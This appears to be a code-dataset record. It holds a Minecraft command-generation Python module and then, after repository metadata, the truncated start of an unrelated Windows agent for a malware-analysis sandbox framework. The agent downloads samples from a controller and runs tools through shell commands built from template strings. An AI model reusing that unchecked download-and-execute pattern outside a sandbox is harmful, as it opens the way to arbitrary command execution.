] | null | null | null | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | import abc
class CommandBlock:
def __init__(self, command, conditional=True, mode='CHAIN', auto=True,
opposite=False, single_use=True):
self.command = command
self.cond = conditional
self.mode = mode
self.auto = auto
self.opposite = opposite
self.single_use = single_use
def resolve(self, scope):
return self.command.resolve(scope)
class Resolvable(metaclass=abc.ABCMeta):
@abc.abstractmethod
def resolve(self, scope):
pass
class SimpleResolve(Resolvable):
def __init__(self, *args):
self.args = args
def resolve(self, scope):
return ' '.join(map(lambda el: el.resolve(scope) \
if isinstance(el, Resolvable) \
else el, self.args))
class Command(Resolvable):
pass
class EntityRef(Resolvable):
def is_single_entity(self, scope):
raise NotImplementedError()
@property
def ref(self):
return EntityReference(self)
class ObjectiveRef(Resolvable):
def __init__(self, name):
assert type(name) == str
self.objective = name
def resolve(self, scope):
return scope.objective(self.objective)
class NameRef(EntityRef):
def __init__(self, name):
assert type(name) == str
self.name = name
@property
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return self.name
class ScoreRef:
def __init__(self, target, objective):
assert isinstance(target, EntityRef)
assert isinstance(objective, ObjectiveRef)
self.target = target
self.objective = objective
def resolve_pair(self, scope):
return '%s %s' % (self.target.resolve(scope),
self.objective.resolve(scope))
class Var(ScoreRef):
def __init__(self, nameref):
super().__init__(GlobalEntity, ObjectiveRef(nameref))
def make_selector(selector, **kwargs):
output = '@' + selector
if not kwargs:
return output
def str_pairs(items):
output = []
for key, value in items:
if type(value) == dict:
value = '{%s}' % str_pairs(value.items())
output.append('%s=%s' % (key, value))
return ','.join(output)
return '%s[%s]' % (output, str_pairs(kwargs.items()))
class Selector(EntityRef):
def __init__(self, type, args=None):
assert type in 'aespr'
self.type = type
assert args is None or isinstance(args, SelectorArgs)
self.args = args
def resolve_params(self, scope):
if not self.args:
return {}
return self.args.resolve(scope)
def is_single_entity(self, scope):
if self.type in 'spr':
return True
params = self.resolve_params(scope)
return 'limit' in params and params['limit'] == '1'
def resolve(self, scope):
return make_selector(self.type, **self.resolve_params(scope))
class _GlobalEntity(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.global_entity()
GlobalEntity = _GlobalEntity()
class _PosUtil(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.pos_util_entity()
PosUtil = _PosUtil()
class NbtPath(Resolvable):
def __init__(self, path):
self.path = path
def subpath(self, childpath):
# TODO path validation
return self.__class__(self.path + childpath)
def resolve(self, scope):
return self.path
def __eq__(self, other):
if type(other) != type(self):
return False
return self.path == other.path
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.path)
class Path(NbtPath):
def resolve(self, scope):
return scope.custom_nbt_path(self.path)
class ArrayPath(Path):
def __init__(self, index=None, key=None):
sub = '[%d]' % index if index is not None else ''
assert key is None or index is not None
sub += '.%s' % key if key else ''
super().__init__('%s%s' % (self.name, sub))
def subpath(self, childpath):
# Don't use our constructor
return Path(self.path).subpath(childpath)
class StackPath(ArrayPath):
name = 'stack'
def StackFrame(index):
class StackFramePath(ArrayPath):
name = 'stack[%d].stack' % (-index - 1)
return StackFramePath
StackFrameHead = StackFrame(0)
class GlobalPath(ArrayPath):
name = 'globals'
class Cmd(Command):
def __init__(self, cmd):
self.command = cmd
def resolve(self, scope):
return self.command
class Execute(Command):
def __init__(self, chain):
self.chain = SimpleResolve(*chain._components)
def resolve(self, scope):
return 'execute %s' % self.chain.resolve(scope)
def ensure_selector(sel_arg):
assert isinstance(sel_arg, EntityRef), sel_arg
return sel_arg
class ExecuteChain:
def __init__(self):
self._components = []
self.can_terminate = False
def add(self, *args):
for arg in args:
if type(arg) in [str, int, float]:
self._components.append(str(arg))
elif isinstance(arg, Resolvable):
self._components.append(arg)
else:
assert False, type(arg)
return self
def run(self, cmd):
self.add('run', cmd)
return Execute(self)
def finish(self):
assert self.can_terminate
return Execute(self)
def as_entity(self, select_arg):
self.can_terminate = False
return self.add('as', ensure_selector(select_arg))
def at(self, select_arg):
self.can_terminate = False
return self.add('at', ensure_selector(select_arg))
def at_pos(self, pos):
self.can_terminate = False
return self.add('positioned', pos)
def at_entity_pos(self, select_arg):
self.can_terminate = False
return self.add('positioned', 'as', ensure_selector(select_arg))
def align(self, axes):
self.can_terminate = False
assert ''.join(axis for axis in axes if axis in 'xyz') == axes
return self.add('align', axes)
def facing(self, pos):
self.can_terminate = False
return self.add('facing', pos)
def facing_entity(self, select_arg, feature):
self.can_terminate = False
assert feature == 'eyes' or feature == 'feet'
return self.add('facing', 'entity', ensure_selector(select_arg), \
feature)
def rotated(self, y, x):
self.can_terminate = False
return self.add('rotated', y, x)
def rotated_as_entity(self, select_arg):
self.can_terminate = False
return self.add('rotated', 'as', ensure_selector(select_arg))
def anchored(self, anchor):
self.can_terminate = False
assert anchor == 'feet' or anchor == 'eyes'
return self.add('anchored', anchor)
def cond(self, cond_type):
self.can_terminate = False
assert cond_type == 'if' or cond_type == 'unless'
return ExecuteChain.Cond(self, cond_type)
class Cond:
def add(self, *args):
self.parent.can_terminate = True
return self.parent.add(*((self.cond_type,) + args))
def __init__(self, parent, cond_type):
self.parent = parent
self.cond_type = cond_type
def entity(self, entityref):
return self.add('entity', ensure_selector(entityref))
def score(self, targetref, operator, sourceref):
assert isinstance(targetref, ScoreRef)
assert isinstance(sourceref, ScoreRef)
assert operator in ['<', '<=', '=', '>=', '>']
return self.add('score', targetref.target, targetref.objective,
operator, sourceref.target, sourceref.objective)
def score_range(self, scoreref, range):
assert isinstance(scoreref, ScoreRef)
assert isinstance(range, ScoreRange)
return self.add('score', scoreref.target, scoreref.objective,
'matches', range)
def block(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
return self.add('block', pos, block)
def blocks_match(self, begin, end, dest, type):
assert type in ['all', 'masked']
return self.add('blocks', begin, end, dest, type)
def store(self, store_type):
assert store_type in ['result', 'success']
self.can_terminate = False
return ExecuteChain.Store(self, store_type)
class Store:
def add(self, *args):
return self.parent.add(*(('store', self.store_type) + args))
def __init__(self, parent, store_type):
self.parent = parent
self.store_type = store_type
def score(self, scoreref):
assert isinstance(scoreref, ScoreRef)
return self.add('score', scoreref.target, scoreref.objective)
def entity(self, target, path, data_type, scale=1):
return self.add('entity', ensure_selector(target), \
path, data_type, scale)
def bossbar(self, bar, attr):
assert attr in ['value', 'max']
return self.add('bossbar', bar, attr)
class BlockOrEntityRef(Resolvable):
pass
class EntityReference(BlockOrEntityRef):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
assert self.target.is_single_entity(scope)
return 'entity %s' % self.target.resolve(scope)
class WorldPos(Resolvable):
def __init__(self, x, y, z, block_pos=False):
is_anchor = self._check_coord(x, True, not block_pos)
was_anchor = self._check_coord(y, is_anchor, not block_pos)
is_anchor = self._check_coord(z, was_anchor, not block_pos)
if was_anchor:
assert is_anchor
self.x, self.y, self.z = x, y, z
self.block_pos = block_pos
def _check_coord(self, val, allow_anchor, allow_float):
if isinstance(val, AnchorRelCoord):
assert allow_anchor
return True
if type(val) == float:
assert allow_float
return False
if type(val) == int:
return False
if isinstance(val, WorldRelCoord):
return False
assert False, val
@property
def ref(self):
return BlockReference(self)
def resolve(self, scope):
return '%s %s %s' % (self.x, self.y, self.z)
class RelativeCoord:
def __init__(self, val):
self.str = self.marker
if type(val) == int:
if val != 0:
self.str += '%d' % val
elif type(val) == float:
if val != 0.0:
# https://stackoverflow.com/a/2440786
self.str += ('%f' % val).rstrip('0').rstrip('.')
else:
assert False, val
self.val = val
def __str__(self):
return self.str
class WorldRelCoord(RelativeCoord):
marker = '~'
class AnchorRelCoord(RelativeCoord):
marker = '^'
class BlockReference(BlockOrEntityRef):
def __init__(self, pos):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
def resolve(self, scope):
return 'block %s' % self.pos.resolve(scope)
class _UtilBlockPos(WorldPos):
def __init__(self, is_zero_tick):
self.block_pos = True
self.is_zero_tick = is_zero_tick
def resolve(self, scope):
if self.is_zero_tick:
return scope.get_zero_tick_block()
return scope.get_util_block()
UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
class DataGet(Command):
def __init__(self, target, path, scale=1):
assert isinstance(target, BlockOrEntityRef)
assert isinstance(scale, (int, float))
self.target = target
self.path = path
self.scale = int(scale) if scale == int(scale) else scale
def resolve(self, scope):
return 'data get %s %s %s' % (self.target.resolve(scope),
self.path.resolve(scope), self.scale)
class DataMerge(Command):
def __init__(self, ref, nbt):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.nbt = nbt
def resolve(self, scope):
return 'data merge %s %s' % (self.ref.resolve(scope),
self.nbt.resolve(scope))
class DataModify(Command):
def __init__(self, ref, path, action, *rest):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
self.action = action
self.init(*rest)
def resolve(self, scope):
return 'data modify %s %s %s' % (
self.ref.resolve(scope), self.path.resolve(scope), self.action)
class DataModifyValue(DataModify):
def init(self, val):
self.val = val
def resolve(self, scope):
return '%s value %s' % (super().resolve(scope), self.val.resolve(scope))
class DataModifyFrom(DataModify):
def init(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.fromref = ref
self.frompath = path
def resolve(self, scope):
return '%s from %s %s' % (super().resolve(scope),
self.fromref.resolve(scope), self.frompath.resolve(scope))
class DataModifyStack(DataModifyValue):
def __init__(self, index, key, action, value, path=StackPath):
super().__init__(GlobalEntity.ref, path(index, key), action,
value)
class DataRemove(Command):
def __init__(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
def resolve(self, scope):
return 'data remove %s %s' % (self.ref.resolve(scope),
self.path.resolve(scope))
class Function(Command):
def __init__(self, func_name):
self.name = func_name
def resolve(self, scope):
return 'function %s' % scope.function_name(self.name)
class Tellraw(Command):
def __init__(self, text, target):
assert isinstance(text, TextComponentHolder)
assert isinstance(target, EntityRef)
self.text = text
self.target = target
def resolve(self, scope):
return 'tellraw %s %s' % (self.target.resolve(scope),
self.text.resolve_str(scope))
class TextComponent(Resolvable):
pass
class TextComponentHolder(TextComponent):
def __init__(self, style, children):
self.style = style
self.children = children
def resolve_str(self, scope):
import json
return json.dumps(self.resolve(scope), separators=(',', ':'))
def resolve(self, scope):
text = {}
for key, value in self.style.items():
text[key] = self._resolve_style(key, value, scope)
extra = []
for child in self.children:
if isinstance(child, TextComponentHolder) and not child.style:
for child_child in child.children:
extra.append(child_child.resolve(scope))
else:
extra.append(child.resolve(scope))
if not self.style:
return extra
if extra:
if len(extra) == 1 and type(extra[0]) == dict:
text.update(extra[0])
else:
text['extra'] = extra
return text
def _resolve_style(self, key, value, scope):
if key == 'clickEvent':
assert isinstance(value, TextClickAction)
return value.resolve(scope)
return value
class TextStringComponent(TextComponent):
def __init__(self, stringval):
self.val = stringval
def resolve(self, scope):
return {'text': self.val}
class TextNBTComponent(TextComponent):
def __init__(self, entity, path):
assert isinstance(entity, EntityRef)
assert isinstance(path, Path)
self.entity = entity
self.path = path
def resolve(self, scope):
assert self.entity.is_single_entity(scope)
return {'nbt': self.path.resolve(scope),
'entity': self.entity.resolve(scope)}
class TextScoreComponent(TextComponent):
def __init__(self, ref):
assert isinstance(ref, ScoreRef)
self.ref = ref
def resolve(self, scope):
return {'score':
{'name': self.ref.target.resolve(scope),
'objective': self.ref.objective.resolve(scope)}}
class TextClickAction(Resolvable):
def __init__(self, action, value):
self.action = action
self.value = value
def resolve(self, scope):
if type(self.value) == str:
value = self.value
else:
assert self.action in ['run_command', 'suggest_command'] \
and isinstance(self.value, Command)
value = self.value.resolve(scope)
return {'action': self.action, 'value': value}
class Teleport(Command):
def __init__(self, target, *more):
assert isinstance(target, EntityRef)
self.args = [target]
self.args.extend(more)
def resolve(self, scope):
return 'tp %s' % ' '.join(a.resolve(scope) for a in self.args)
class Clone(Command):
def __init__(self, src0, src1, dest):
self.src0 = src0
self.src1 = src1
self.dest = dest
def resolve(self, scope):
return 'clone %s %s %s' % (self.src0.resolve(scope),
self.src1.resolve(scope),
self.dest.resolve(scope))
class Setblock(Command):
def __init__(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
self.block = block
def resolve(self, scope):
return 'setblock %s %s' % (self.pos.resolve(scope),
self.block.resolve(scope))
class Scoreboard(Command):
allows_negative = False
def __init__(self, varref, value):
assert isinstance(varref, ScoreRef)
assert isinstance(value, int)
assert self.allows_negative or value >= 0
self.var = varref
self.value = value
def resolve(self, scope):
return 'scoreboard players %s %s %d' % (
self.op, self.var.resolve_pair(scope), self.value)
class SetConst(Scoreboard):
op = 'set'
allows_negative = True
class AddConst(Scoreboard):
op = 'add'
class RemConst(Scoreboard):
op = 'remove'
class GetValue(Command):
def __init__(self, scoreref):
assert isinstance(scoreref, ScoreRef)
self.ref = scoreref
def resolve(self, scope):
return 'scoreboard players get %s' % self.ref.resolve_pair(scope)
class Operation(Command):
def __init__(self, left, right):
assert isinstance(left, ScoreRef)
assert isinstance(right, ScoreRef)
self.left = left
self.right = right
def resolve(self, scope):
return 'scoreboard players operation %s %s %s' % (
self.left.resolve_pair(scope), self.op,
self.right.resolve_pair(scope))
class OpAssign(Operation): op = '='
class OpAdd(Operation): op = '+='
class OpSub(Operation): op = '-='
class OpMul(Operation): op = '*='
class OpDiv(Operation): op = '/='
class OpMod(Operation): op = '%='
class OpIfLt(Operation): op = '<'
class OpIfGt(Operation): op = '>'
class OpSwap(Operation): op = '><'
class SelectorArgs(Resolvable):
pass
class SimpleSelectorArgs(SelectorArgs):
def __init__(self, args):
self.args = args
def resolve(self, scope):
return dict(self.args)
class ScoreRange(Resolvable):
def __init__(self, min=None, max=None):
assert min is not None or max is not None
self.min = min
self.max = max
def resolve(self, scope):
range = ''
if self.min is not None:
range = '%d' % self.min
if self.max is not None and self.max != self.min:
range += '..%d' % self.max
elif self.max is None:
range += '..'
return range
class SelRange(SelectorArgs):
def __init__(self, objective, min=None, max=None):
assert isinstance(objective, ObjectiveRef)
self.objective = objective
self.range = ScoreRange(min, max)
def resolve(self, scope):
return {'scores': { self.objective.resolve(scope):
self.range.resolve(scope) }}
class SelEquals(SelRange):
def __init__(self, objective, value):
super().__init__(objective, value, value)
class ComboSelectorArgs(SelectorArgs):
@staticmethod
def new(first, second):
if first is None: return second
if second is None: return first
return ComboSelectorArgs(first, second)
def __init__(self, first, second):
self.first = first
self.second = second
def resolve(self, scope):
sel = {}
sel.update(self.first.resolve(scope))
sel.update(self.second.resolve(scope))
return sel
class SelNbt(SelectorArgs):
def __init__(self, path, value):
self.nbt_spec = {}
if not path:
self.nbt_spec = value
else:
self.build_selector(path, self.nbt_spec, value)
def build_selector(self, path, parent, value):
for i in range(len(path) - 1):
node = path[i]
if node.isdigit():
pos = int(node)
while len(parent) < pos + 1:
parent.append({})
parent = parent[pos]
continue
if node not in parent:
parent[node] = {}
if len(path) > i + 1:
if path[i+1].isdigit():
if not parent[node]:
parent[node] = []
else:
assert type(parent[node]) == list
parent = parent[node]
if path[-1].isdigit():
pos = int(path[-1])
while len(parent) < pos + 1:
parent.append({})
path[-1] = pos
parent[path[-1]] = value
def stringify_nbt(self, node, scope):
# TODO quoted keys
if type(node) == dict:
return '{%s}' % ','.join('%s:%s' % (k, self.stringify_nbt(v, scope))
for k,v in node.items())
if type(node) == list:
return '[%s]' % ','.join(map(lambda n:self.stringify_nbt(n, scope), node))
if isinstance(node, Resolvable):
return node.resolve(scope)
assert False, type(node)
def resolve(self, scope):
return {'nbt': self.stringify_nbt(self.nbt_spec, scope)}
class TeamName(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.team_name(self.name)
class TeamModify(Command):
def __init__(self, team, attr, value):
assert isinstance(team, TeamName)
self.team = team
assert attr in ['color', 'friendlyFire', 'seeFriendlyInvisibles',
'nametagVisibility', 'deathMessageVisibility',
'collisionRule', 'displayName', 'prefix', 'suffix']
self.attr = attr
self.value = value
def resolve(self, scope):
return 'team modify %s %s %s' % (self.team.resolve(scope), self.attr,
self.value)
class JoinTeam(Command):
def __init__(self, team, members):
assert isinstance(team, TeamName)
assert members is None or isinstance(members, EntityRef)
self.team = team
self.members = members
def resolve(self, scope):
members = (' ' + self.members.resolve(scope)) if self.members else ''
return 'team join %s%s' % (self.team.resolve(scope), members)
class Bossbar(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.bossbar(self.name)
class BossbarSet(Command):
def __init__(self, bar, prop, value):
assert isinstance(bar, Bossbar)
self.bar = bar
self.prop = prop
self.value = value
def resolve(self, scope):
value = (' ' + self.value.resolve(scope)) if self.value else ''
return 'bossbar set %s %s%s' % (self.bar.resolve(scope), self.prop,
value)
class Kill(Command):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
return 'kill %s' % self.target.resolve(scope)
class ReplaceItem(Command):
def __init__(self, ref, slot, item, amount=None):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.slot = slot
self.item = item
self.amount = amount
def resolve(self, scope):
amount = (' %d' % self.amount) if self.amount is not None else ''
return 'replaceitem %s %s %s%s' % (self.ref.resolve(scope), self.slot,
self.item.resolve(scope), amount)
class GiveItem(Command):
def __init__(self, targets, item, count=1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.count = count
def resolve(self, scope):
return 'give %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.count)
class ClearItem(Command):
def __init__(self, targets, item, max_count=-1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.max_count = max_count
def resolve(self, scope):
return 'clear %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.max_count)
class EffectGive(Command):
def __init__(self, target, effect, seconds=None, amp=None, hide=None):
assert isinstance(target, EntityRef)
self.target = target
self.effect = effect
self.seconds = seconds if seconds is not None else 30
self.amp = amp if amp is not None else 0
self.hide = hide if hide is not None else False
def resolve(self, scope):
return 'effect give %s %s %d %d %s' % (self.target.resolve(scope),
self.effect, self.seconds, self.amp,
'true' if self.hide else 'false')
class Particle(Command):
def __init__(self, name, pos, delta, speed, count, mode, players):
self.name = name
self.pos = pos
self.delta = delta
self.speed = speed
self.count = count
self.mode = mode
self.players = players
def resolve(self, scope):
players = (' ' + self.players.resolve(scope)) if self.players else ''
return 'particle %s %s %s %f %d %s%s' % (self.name,
self.pos.resolve(scope), self.delta.resolve(scope),
self.speed, self.count, self.mode, players)
class Title(Command):
def __init__(self, target, action, *args):
assert isinstance(target, EntityRef)
self.target = target
self.action = action
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'title %s %s%s' % (self.target.resolve(scope), self.action, args)
class Summon(Command):
def __init__(self, entity_name, pos, data=None):
assert pos is None or isinstance(pos, WorldPos)
self.name = entity_name
self.pos = pos
self.data = data
def resolve(self, scope):
pos = (' ' + self.pos.resolve(scope)) if self.pos else \
(' ~ ~ ~' if self.data else '')
data = (' ' + self.data.resolve(scope)) if self.data else ''
return 'summon %s%s%s' % (self.name, pos, data)
class Advancement(Command):
def __init__(self, action, target, range, *args):
assert action in ['grant', 'revoke']
assert isinstance(target, EntityRef)
self.action = action
self.target = target
self.range = range
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'advancement %s %s %s%s' % (self.action,
self.target.resolve(scope),
self.range, args)
class AdvancementRef(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.advancement_name(self.name)
| 29.327291 | 86 | 0.588215 | 3,381 | 29,122 | 4.931381 | 0.097013 | 0.046063 | 0.039585 | 0.062676 | 0.325496 | 0.23571 | 0.177652 | 0.148384 | 0.113837 | 0.1046 | 0 | 0.002054 | 0.297816 | 29,122 | 992 | 87 | 29.356855 | 0.813292 | 0.003399 | 0 | 0.282086 | 0 | 0 | 0.03708 | 0.001482 | 0 | 0 | 0 | 0.001008 | 0.096257 | 1 | 0.219251 | false | 0.008021 | 0.002674 | 0.070856 | 0.513369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469862e42b088f23b41b49c8734db4c50395bddc | 28,022 | py | Python | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 21 | 2019-10-24T04:59:52.000Z | 2021-05-11T12:47:17.000Z | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | null | null | null | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 9 | 2019-10-26T16:56:08.000Z | 2021-03-15T14:10:21.000Z | import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
running_os = platform.release()
if running_os == "7":
APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
current_user=getpass.getuser())
elif running_os == "XP":
# To avoid tool issues when dealing with white-spaced paths.
APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
current_user=getpass.getuser())
else:
print "Unsupported platform! Exiting..."
sys.exit()
class FilterSpecialVars():
def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
# unfiltered_data should be a list
self.unfiltered_data = unfiltered_data
self.filtered_data = []
self.special_vars = {
'@appdata@': APP_DATA, # os.path.expandvars('%appdata%'),
'@temp@': TMP_FOLDER,
'@toolname@': template['tool_name'], # "peid"
'@filename@': template.tool.filename, # "peid.exe"
'@rid@': template['rid'],
'@md5@': template['md5'],
'@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
'@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
'@tool_drive@': template['tool_drive'],
'@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
'@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
template.tool.filename),
'@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
}
if custom_user_vars != None:
self.custom_user_vars_filter(custom_user_vars)
def custom_user_vars_filter(self, custom_user_vars):
if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
for k, v in custom_user_vars.items():
key = "@{}@".format(k)
self.special_vars.update({key: v})
if DEBUG: print self.special_vars
def filter_now(self):
def do_filter(unfiltered_string):
for k, v in self.special_vars.items():
if k in str(unfiltered_string):
unfiltered_string = unfiltered_string.replace(k, v)
if DEBUG: print ">> Found: {}".format(unfiltered_string)
return unfiltered_string
for unfiltered_string in self.unfiltered_data:
if len(unfiltered_string) != 0:
if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
self.filtered_data.append(do_filter(unfiltered_string))
if DEBUG: print self.special_vars
if DEBUG:
print"FILTERED: {}".format(self.filtered_data)
# return " ".join(self.filtered_data)
class File(object):
def __init__(self):
pass
def generate_random_file_name(self):
import string
import random
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))
def zip_file(self, file_abs_path, seconds=5):
if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
#time.sleep(5)
try:
zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
if DEBUG: print zip_filename
original_filename = os.path.basename(file_abs_path)
if DEBUG: print original_filename
path_location = os.path.dirname(file_abs_path)
if DEBUG: print path_location
zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
if DEBUG: print zip_file_abs_path
zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
# When a file is bein created as compressed file (zip), in some cases
# the set delay time is not enough and file-access errors appears.
# To avoid such situation, several attempts are made until the access
# to the source file is ready.
try:
zf.write(file_abs_path, os.path.basename(file_abs_path))
except IOError:
if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
time.sleep(seconds)
self.zip_file(file_abs_path)
else:
if DEBUG: print "Zip file creation - Done."
except OSError as e:
if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
raise
else:
zipfile.ZIP_DEFLATED
if os.path.isfile(zip_file_abs_path):
if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
# os.remove(file_abs_path)
return zip_filename
else:
if DEBUG: print "Zip file can't be created"
return None
class AutoItScript(File):
def __init__(self, automation_data):
self.autoit_script = None
self.__base64totmp(automation_data)
def __base64totmp(self, automation_data):
if DEBUG: print "Converting from base64 file data to Auto-it Script"
tmp_au_script_abs_path = os.path.join(
APP_DATA, self.generate_random_file_name())
with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
for _ in automation_data:
if DEBUG: print "Writing: {}\n".format(_)
tmp_au_script.write(_)
self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
def __init__(self, download_url):
self.download_dir = APP_DATA
self.fake_file_name = self.generate_random_file_name()
self.original_file_name = os.path.basename(download_url)
self.extension = os.path.splitext(download_url)[1].replace('.', '')
#self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
# self.fake_file_name, self.extension))
self.abs_path = os.path.join(self.download_dir, self.original_file_name)
if DEBUG:
print self.abs_path
class ExecutionManager(object):
report_path = ""
sample_abs_path = ""
#### Agent Command Control ######
def execute_tool(self, **cmd_data):
if DEBUG:
print cmd_data
tool_drive = cmd_data['tool_drive']
tool_path = cmd_data['tool_path'].replace('/', '\\')
tool_name = cmd_data['tool_name']
tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
tool_drive=tool_drive,
tool_path=tool_path,
tool_name=tool_name,
)
if DEBUG:
print tool_abs_path
tool_args = cmd_data['tool_args']
if DEBUG:
print tool_args
cmd = "{} {}".format(tool_abs_path, tool_args)
if DEBUG:
print cmd
print "\nExecuting Cmd: {}\n".format(cmd)
subprocess.call(cmd, shell=True)
def exec_manager(self, **cmd_data):
if DEBUG:
if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
thread_name = cmd_data['tool_name']
thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
thread.start()
def write_tmp_file(self, datatowrite, sample_abs_path):
try:
if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
with open(sample_abs_path, 'wb+') as f:
f.write(datatowrite)
except:
if DEBUG: print "Error while creating the tmp file."
else:
if DEBUG: print "Done."
if os.path.isfile(sample_abs_path):
if DEBUG: print "Temp file created correctly."
# Destination folder is created this way because because
# some tools shows weird behaviors when passing arguments
# For instance, CFF Explorer does not work correctly when
# the file agument resides on a directory with whitespaces.
# The workaround is to use DOS version of the path.
#fixed_sample_abs_path = sample_abs_path.split('\\')
#fixed_sample_abs_path[1] = "docume~1"
#fixed_sample_abs_path[3] = "applic~1"
# print fixed_sample_abs_path
# Setting up Class attribute for sample path
return sample_abs_path
return False
def download_file(self, download_url):
if DEBUG: print "Downloading: {}".format(download_url)
try:
import urllib2
filedata = urllib2.urlopen(download_url)
except urllib2.URLError:
if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
return False
else:
datatowrite = filedata.read()
sample_abs_path = DownloadedFile(download_url).abs_path
# Used when filtering custom variables
ExecutionManager.sample_abs_path = sample_abs_path
if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
return self.write_tmp_file(datatowrite, sample_abs_path)
def execute_autoit_script(self, template, auto_it_script_abs_path):
# The previously generated AutoIT script will be executed.
if DEBUG: print "Executing Auto-It script"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path='misc\\autoitv3\\',
tool_name='AutoIt3.exe',
tool_args=auto_it_script_abs_path)
def tool_execution(self, template):
def selected_execution(filtered_parameters, filtered_automation):
cascade_execution = False
if filtered_parameters is not None and filtered_automation is not None:
if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
cascade_execution = True
if filtered_parameters is not None:
if DEBUG: print "Parameter Execution Detected"
self.exec_manager(
tool_drive=template.tool_drive,
tool_path=template.remote_tool_path,
tool_name=template.tool.filename,
tool_args=filtered_parameters
)
if filtered_automation is not None:
# If cascase execution is set, then a delay between tool execution
# and automation is also set. This to allow the tool to properly
# load and the automation be able to run properly. A default value
# of 5 seconds was given.
if cascade_execution:
if DEBUG: print "Cascade Execution Delay - Running now..."
time.sleep(5)
if DEBUG: print "Automation-Only Execution Detected"
custom_user_vars = template.configuration.execution.custom_user_vars
auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
self.execute_autoit_script(template, auto_it_script_abs_path)
def filter_custom_vars(template, filter_type=None):
# Handling template parameters custom vars
if filter_type is not None:
custom_user_vars = template.configuration.execution.custom_user_vars
if filter_type == "parameters":
parameters = template.actions[template.actions.action]['parameters']
if parameters is not None:
if DEBUG: print "Parameters: {}".format(parameters)
if len(custom_user_vars) != 0:
